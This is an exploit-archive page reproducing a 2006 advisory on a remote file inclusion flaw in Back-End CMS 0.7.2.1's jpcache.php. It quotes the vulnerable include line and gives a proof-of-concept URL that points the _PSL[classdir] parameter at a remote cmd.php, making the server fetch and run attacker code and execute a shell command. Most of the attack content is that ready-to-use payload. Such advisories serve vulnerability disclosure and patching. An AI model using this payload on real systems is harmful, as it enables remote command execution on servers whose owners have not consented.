[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Back-End CMS <= 0.7.2.1 (jpcache.php) Remote Include Vulnerability
# Published : 2006-06-08
# Author : Federico Fazzi
# Previous Title : MailEnable Enterprise <= 2.0 (ASP Version) Multiple Vulnerabilities
# Next Title : cms-bandits 2.5 (spaw_root) Remote File Include Vulnerabilities
# Federico Fazzi, <federico@autistici.org>
# Back-end = 0.7.2.1 (jpcache.php) Remote command execution
# 08/06/2006 1:04
# Bug:
#
# jpcache.php: line 40
#
# ---
# $includedir = $_PSL['classdir'] . "/jpcache";
# ---
#
# Proof of concept:
#
# Back-end have a default path pre-set on jpcache.php,
# and cracker can execute a remote command.
#
# http://example/[be_path]/class/jpcache/jpcache.php?_PSL[classdir]=http://example/cmd.php?exec=uname
# www.Syue.com [2006-06-08]